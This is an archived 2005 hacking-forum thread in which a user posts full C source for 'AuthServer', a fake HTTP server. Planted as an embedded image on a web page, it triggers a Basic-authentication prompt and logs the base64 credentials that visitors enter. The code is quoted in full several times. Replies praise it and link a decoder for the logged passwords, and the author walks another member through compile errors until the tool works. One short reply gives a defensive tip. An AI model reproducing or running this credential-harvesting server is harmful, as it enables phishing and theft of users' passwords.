Articles
|
|
JustAsFire
Aug 10 2005, 02:10 PM
QUOTE Discovered by: JustAsFire JustAsFire@gmail.com Vulnerable: Any web page in which you can insert images hosted on other servers. Description: If a web page contains an image from a site which requiers authentication, an Username/ Password prompt displaying host name and authentication realm will apear asking for username and password. A malicious http server could be used to log the credientials of the users who would authenticate. ***********************************POC****************************************** ********************************** CODE / ******************************************************************************** *********************************** ***name : AuthServer.c ***author : JustAsFire JustAsFire[at]gmail.com ***description : a very simple web server which sends a 401 Authorization request to anyone *** connecting to it. If the client authetificates it stores the username and password *** in the file userlog(encrypted in base64). *** *** ******************************************************************************** ***********************************/ #include <stdio.h> #include <sys/socket.h> #include <arpa/inet.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <netinet/in.h> #define MAXPENDING 5 #define BUFFSIZE 10000 void Die(char *mess) { perror(mess); exit(1); } int GetCredientials(char *buffer){ char s[200], *p; int i; FILE *f; p=strstr(buffer, "Authorization: Basic "); if (p){ if ( strlen(p)>50 ){ printf("Buffer overflow atempt"); return 0; } for (i=0; i+25 < strlen(p); i++) s[i]=p[21+i]; printf("\n%s\n",s); f=fopen("userlog", "a"); fprintf(f,"%s\n",s); fclose(f); return 1; } else return 0; } void HandleClient(int sock){ char buffer[BUFFSIZE]; char *s; if (read(sock, buffer, BUFFSIZE) <0) Die("Failed to receive bytes from client"); if ( GetCredientials(buffer)==0 ){ char *s="HTTP/1.1 401 Authorization Require\nServer: AuthServer/0.01 (Unix)\nWWW-Authenticate: Basic realm=\" ...It's a scam don't do it... \"\nKeep-Alive: timeout=15, max=100\nConnection: Keep-Alive\nTransfer-Encoding: chunked\nContent-Type: text/html; charset=iso-8859-1\n\n"; write(sock,s,strlen(s)); } close(sock); } int main (int argc, char *argv[]) { int serversock, clientsock; struct sockaddr_in server, client; if ( argc != 2 ) { fprintf(stderr, "USAGE: AuthServer <port>\n"); exit(1); } if ((serversock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { Die("Failed to create socket"); } memset(&server, 0, sizeof(server)); server.sin_family = AF_INET; server.sin_addr.s_addr = htonl(INADDR_ANY); server.sin_port = htons(atoi(argv[1])); if (bind(serversock, (struct sockaddr *) &server, sizeof(server)) < 0) { Die("Failed to bind the server socket"); } if (listen(serversock, MAXPENDING) < 0) { Die("Failed to listen on server socket"); } fprintf(stdout,"Created by: JustAsFire -- JustAsFire[at]gmail.com\n"); fprintf(stdout,"Listening for connections...\n"); while (1) { unsigned int clientlen = sizeof(client); if ((clientsock = accept(serversock, (struct sockaddr *) &client, &clientlen)) < 0) { Die("Failed to accept client connection"); } fprintf(stdout, "Client connected: %s\n", inet_ntoa(client.sin_addr)); HandleClient(clientsock); } } P.S. I've discovered this vulnerabilty on this forum 
cvh
Aug 10 2005, 03:48 PM
Very interesting find, this css really scares me, you almost can't protect yourself against it. It just pop-ups when you open a topic on a forum or like JustAsFire says any web page in which you can insert images hosted on other servers. So don't retype your password at a site which request to retype your password, when the servers addresses don't match between the site you are visiting and the requesting site. You can view the address in the requesting form. ps: I tested it against the gso warserver  and here is a java base64 decoder for decoding the logged usernames and passwords http://mit.edu/harold/www/code.htmlThanks for the contribution and I hope to see many more hacks from you JustAsFire.
JustAsFire
Aug 10 2005, 03:52 PM
Thanks. But look with more attention at your screenshot it says:" it's a scam don't do it".  You should have first edited the source code.
cvh
Aug 10 2005, 04:09 PM
QUOTE(JustAsFire @ Aug 10 2005, 04:52 PM) Thanks. But look with more attention at your screenshot it says:" it's a scam don't do it". You should have first edited the source code. Yes I know, I have tested it on the wargame server not the main server, I didn't wanted to log anyone's password here. I wasn't going to give the kiddies here ideas, it's a very dangerous xss. I'm thinking of rewriting this in perl/python or java to make it platform independent.
whisker
Aug 10 2005, 06:51 PM
QUOTE(JustAsFire @ Aug 10 2005, 02:10 PM) QUOTE Discovered by: JustAsFire JustAsFire@gmail.com Vulnerable: Any web page in which you can insert images hosted on other servers. Description: If a web page contains an image from a site which requiers authentication, an Username/ Password prompt displaying host name and authentication realm will apear asking for username and password. A malicious http server could be used to log the credientials of the users who would authenticate. ***********************************POC****************************************** ********************************** CODE / ******************************************************************************** *********************************** ***name : AuthServer.c ***author : JustAsFire JustAsFire[at]gmail.com ***description : a very simple web server which sends a 401 Authorization request to anyone *** connecting to it. If the client authetificates it stores the username and password *** in the file userlog(encrypted in base64). *** *** ******************************************************************************** ***********************************/ #include <stdio.h> #include <sys/socket.h> #include <arpa/inet.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <netinet/in.h> #define MAXPENDING 5 #define BUFFSIZE 10000 void Die(char *mess) { perror(mess); exit(1); } int GetCredientials(char *buffer){ char s[200], *p; int i; FILE *f; p=strstr(buffer, "Authorization: Basic "); if (p){ if ( strlen(p)>50 ){ printf("Buffer overflow atempt"); return 0; } for (i=0; i+25 < strlen(p); i++) s[i]=p[21+i]; printf("\n%s\n",s); f=fopen("userlog", "a"); fprintf(f,"%s\n",s); fclose(f); return 1; } else return 0; } void HandleClient(int sock){ char buffer[BUFFSIZE]; char *s; if (read(sock, buffer, BUFFSIZE) <0) Die("Failed to receive bytes from client"); if ( GetCredientials(buffer)==0 ){ char *s="HTTP/1.1 401 Authorization Require\nServer: AuthServer/0.01 (Unix)\nWWW-Authenticate: Basic realm=\" ...It's a scam don't do it... \"\nKeep-Alive: timeout=15, max=100\nConnection: Keep-Alive\nTransfer-Encoding: chunked\nContent-Type: text/html; charset=iso-8859-1\n\n"; write(sock,s,strlen(s)); } close(sock); } int main (int argc, char *argv[]) { int serversock, clientsock; struct sockaddr_in server, client; if ( argc != 2 ) { fprintf(stderr, "USAGE: AuthServer <port>\n"); exit(1); } if ((serversock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { Die("Failed to create socket"); } memset(&server, 0, sizeof(server)); server.sin_family = AF_INET; server.sin_addr.s_addr = htonl(INADDR_ANY); server.sin_port = htons(atoi(argv[1])); if (bind(serversock, (struct sockaddr *) &server, sizeof(server)) < 0) { Die("Failed to bind the server socket"); } if (listen(serversock, MAXPENDING) < 0) { Die("Failed to listen on server socket"); } fprintf(stdout,"Created by: JustAsFire -- JustAsFire[at]gmail.com\n"); fprintf(stdout,"Listening for connections...\n"); while (1) { unsigned int clientlen = sizeof(client); if ((clientsock = accept(serversock, (struct sockaddr *) &client, &clientlen)) < 0) { Die("Failed to accept client connection"); } fprintf(stdout, "Client connected: %s\n", inet_ntoa(client.sin_addr)); HandleClient(clientsock); } } P.S. I've discovered this vulnerabilty on this forum
whisker
Aug 10 2005, 06:55 PM
QUOTE(whisker @ Aug 10 2005, 06:51 PM) QUOTE(JustAsFire @ Aug 10 2005, 02:10 PM) QUOTE Discovered by: JustAsFire JustAsFire@gmail.com Vulnerable: Any web page in which you can insert images hosted on other servers. Description: If a web page contains an image from a site which requiers authentication, an Username/ Password prompt displaying host name and authentication realm will apear asking for username and password. A malicious http server could be used to log the credientials of the users who would authenticate. ***********************************POC****************************************** ********************************** CODE / ******************************************************************************** *********************************** ***name : AuthServer.c ***author : JustAsFire JustAsFire[at]gmail.com ***description : a very simple web server which sends a 401 Authorization request to anyone *** connecting to it. If the client authetificates it stores the username and password *** in the file userlog(encrypted in base64). *** *** ******************************************************************************** ***********************************/ #include <stdio.h> #include <sys/socket.h> #include <arpa/inet.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <netinet/in.h> #define MAXPENDING 5 #define BUFFSIZE 10000 void Die(char *mess) { perror(mess); exit(1); } int GetCredientials(char *buffer){ char s[200], *p; int i; FILE *f; p=strstr(buffer, "Authorization: Basic "); if (p){ if ( strlen(p)>50 ){ printf("Buffer overflow atempt"); return 0; } for (i=0; i+25 < strlen(p); i++) s[i]=p[21+i]; printf("\n%s\n",s); f=fopen("userlog", "a"); fprintf(f,"%s\n",s); fclose(f); return 1; } else return 0; } void HandleClient(int sock){ char buffer[BUFFSIZE]; char *s; if (read(sock, buffer, BUFFSIZE) <0) Die("Failed to receive bytes from client"); if ( GetCredientials(buffer)==0 ){ char *s="HTTP/1.1 401 Authorization Require\nServer: AuthServer/0.01 (Unix)\nWWW-Authenticate: Basic realm=\" ...It's a scam don't do it... \"\nKeep-Alive: timeout=15, max=100\nConnection: Keep-Alive\nTransfer-Encoding: chunked\nContent-Type: text/html; charset=iso-8859-1\n\n"; write(sock,s,strlen(s)); } close(sock); } int main (int argc, char *argv[]) { int serversock, clientsock; struct sockaddr_in server, client; if ( argc != 2 ) { fprintf(stderr, "USAGE: AuthServer <port>\n"); exit(1); } if ((serversock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { Die("Failed to create socket"); } memset(&server, 0, sizeof(server)); server.sin_family = AF_INET; server.sin_addr.s_addr = htonl(INADDR_ANY); server.sin_port = htons(atoi(argv[1])); if (bind(serversock, (struct sockaddr *) &server, sizeof(server)) < 0) { Die("Failed to bind the server socket"); } if (listen(serversock, MAXPENDING) < 0) { Die("Failed to listen on server socket"); } fprintf(stdout,"Created by: JustAsFire -- JustAsFire[at]gmail.com\n"); fprintf(stdout,"Listening for connections...\n"); while (1) { unsigned int clientlen = sizeof(client); if ((clientsock = accept(serversock, (struct sockaddr *) &client, &clientlen)) < 0) { Die("Failed to accept client connection"); } fprintf(stdout, "Client connected: %s\n", inet_ntoa(client.sin_addr)); HandleClient(clientsock); } } P.S. I've discovered this vulnerabilty on this forum  I've got alot error compiling this on linux,I think the codes char changed when I copy paste from quote..could you upload it to any any website so I can wget it..and tested it ...thanks
Ecko
Aug 10 2005, 07:09 PM
i dont understand this exploit...this exploit logs till someone logs into a htaccess system or what?
JustAsFire
Aug 10 2005, 07:14 PM
QUOTE(Ecko @ Aug 10 2005, 07:09 PM) i dont understand this exploit...this exploit logs till someone logs into a htaccess system or what? Description: If a web page contains an image from a site which requiers authentication, an Username/ Password prompt displaying host name and authentication realm will apear asking for username and password. A malicious http server could be used to log the credientials of the users who would authenticate. @whisker you can also find it on the FullDIsclosure mailling list http://seclists.org/lists/fulldisclosure/2005/Aug/0283.html. Also you could edit your posts and delete those big quotes.
whisker
Aug 10 2005, 07:27 PM
QUOTE(JustAsFire @ Aug 10 2005, 07:14 PM) QUOTE(Ecko @ Aug 10 2005, 07:09 PM) i dont understand this exploit...this exploit logs till someone logs into a htaccess system or what? Description: If a web page contains an image from a site which requiers authentication, an Username/ Password prompt displaying host name and authentication realm will apear asking for username and password. A malicious http server could be used to log the credientials of the users who would authenticate. @whisker you can also find it on the FullDIsclosure mailling list http://seclists.org/lists/fulldisclosure/2005/Aug/0283.htmlstill error..I think need to fix it a bit: CODE
cc AuthServer.c -o AuthServer
AuthServer.c:56:25: missing terminating " character
AuthServer.c: In function `HandleClient':
AuthServer.c:57: error: parse error before "AuthServer"
AuthServer.c:58: error: stray '\' in program
AuthServer.c:58: error: stray '\' in program
AuthServer.c:58:40: missing terminating " character
AuthServer.c:59: error: stray '\' in program
AuthServer.c:59:10: missing terminating " character
AuthServer.c:60: error: stray '\' in program
AuthServer.c:60: error: stray '\' in program
AuthServer.c:61: error: `charset' undeclared (first use in this function)
AuthServer.c:61: error: (Each undeclared identifier is reported only once
AuthServer.c:61: error: for each function it appears in.)
AuthServer.c:61: error: `iso' undeclared (first use in this function)
AuthServer.c:61: error: stray '\' in program
AuthServer.c:61: error: parse error before "n"
AuthServer.c:61: error: stray '\' in program
AuthServer.c:61:23: missing terminating " character
AuthServer.c:95:24: missing terminating " character
AuthServer.c: In function `main':
AuthServer.c:96: error: parse error before "JustAsFire"
AuthServer.c:96: error: stray '\' in program
AuthServer.c:96:26: missing terminating " character
make: *** [AuthServer] Error 1
Cheers for the link
JustAsFire
Aug 10 2005, 07:43 PM
CODE
char *s="HTTP/1.1 401 Authorization Require\nServer: AuthServer/0.01 (Unix)\nWWW-Authenticate: Basic realm=\" ...It's a scam don't do it... \"\nKeep-Alive: timeout=15, max=100\nConnection: Keep-Alive\nTransfer-Encoding: chunked\nContent-Type: text/html; charset=iso-8859-1\n\n";
Your problem is here even though it iseems to be in multiple lines this part of the code it is actually one line. When you paste it, it probably changes into multiple lines.
whisker
Aug 10 2005, 08:09 PM
QUOTE(JustAsFire @ Aug 10 2005, 07:43 PM) CODE
char *s="HTTP/1.1 401 Authorization Require\nServer: AuthServer/0.01 (Unix)\nWWW-Authenticate: Basic realm=\" ...It's a scam don't do it... \"\nKeep-Alive: timeout=15, max=100\nConnection: Keep-Alive\nTransfer-Encoding: chunked\nContent-Type: text/html; charset=iso-8859-1\n\n";
Your problem is here even though it iseems to be in multiple lines this part of the code it is actually one line. When you paste it, it probably changes into multiple lines. Thanks for clarified..it worked now...(I should look carefully...just got up from bed  ) cheers
Xardas
Aug 10 2005, 08:33 PM
your good 10x! QUOTE(JustAsFire @ Aug 10 2005, 02:10 PM) QUOTE Discovered by: JustAsFire JustAsFire@gmail.com Vulnerable: Any web page in which you can insert images hosted on other servers. Description: If a web page contains an image from a site which requiers authentication, an Username/ Password prompt displaying host name and authentication realm will apear asking for username and password. A malicious http server could be used to log the credientials of the users who would authenticate. ***********************************POC****************************************** ********************************** CODE / ******************************************************************************** *********************************** ***name : AuthServer.c ***author : JustAsFire JustAsFire[at]gmail.com ***description : a very simple web server which sends a 401 Authorization request to anyone *** connecting to it. If the client authetificates it stores the username and password *** in the file userlog(encrypted in base64). *** *** ******************************************************************************** ***********************************/ #include <stdio.h> #include <sys/socket.h> #include <arpa/inet.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <netinet/in.h> #define MAXPENDING 5 #define BUFFSIZE 10000 void Die(char *mess) { perror(mess); exit(1); } int GetCredientials(char *buffer){ char s[200], *p; int i; FILE *f; p=strstr(buffer, "Authorization: Basic "); if (p){ if ( strlen(p)>50 ){ printf("Buffer overflow atempt"); return 0; } for (i=0; i+25 < strlen(p); i++) s[i]=p[21+i]; printf("\n%s\n",s); f=fopen("userlog", "a"); fprintf(f,"%s\n",s); fclose(f); return 1; } else return 0; } void HandleClient(int sock){ char buffer[BUFFSIZE]; char *s; if (read(sock, buffer, BUFFSIZE) <0) Die("Failed to receive bytes from client"); if ( GetCredientials(buffer)==0 ){ char *s="HTTP/1.1 401 Authorization Require\nServer: AuthServer/0.01 (Unix)\nWWW-Authenticate: Basic realm=\" ...It's a scam don't do it... \"\nKeep-Alive: timeout=15, max=100\nConnection: Keep-Alive\nTransfer-Encoding: chunked\nContent-Type: text/html; charset=iso-8859-1\n\n"; write(sock,s,strlen(s)); } close(sock); } int main (int argc, char *argv[]) { int serversock, clientsock; struct sockaddr_in server, client; if ( argc != 2 ) { fprintf(stderr, "USAGE: AuthServer <port>\n"); exit(1); } if ((serversock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { Die("Failed to create socket"); } memset(&server, 0, sizeof(server)); server.sin_family = AF_INET; server.sin_addr.s_addr = htonl(INADDR_ANY); server.sin_port = htons(atoi(argv[1])); if (bind(serversock, (struct sockaddr *) &server, sizeof(server)) < 0) { Die("Failed to bind the server socket"); } if (listen(serversock, MAXPENDING) < 0) { Die("Failed to listen on server socket"); } fprintf(stdout,"Created by: JustAsFire -- JustAsFire[at]gmail.com\n"); fprintf(stdout,"Listening for connections...\n"); while (1) { unsigned int clientlen = sizeof(client); if ((clientsock = accept(serversock, (struct sockaddr *) &client, &clientlen)) < 0) { Die("Failed to accept client connection"); } fprintf(stdout, "Client connected: %s\n", inet_ntoa(client.sin_addr)); HandleClient(clientsock); } } P.S. I've discovered this vulnerabilty on this forum
Xardas
Aug 10 2005, 08:36 PM
10x man u rull!!!!
JustAsFire
Aug 10 2005, 08:40 PM
@xardas: you should say thnks for warn/ban. Bearded nose is hunting for youCould a moderator be so kind and delete all the offtopics and imense quotes? thnks
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
|
|
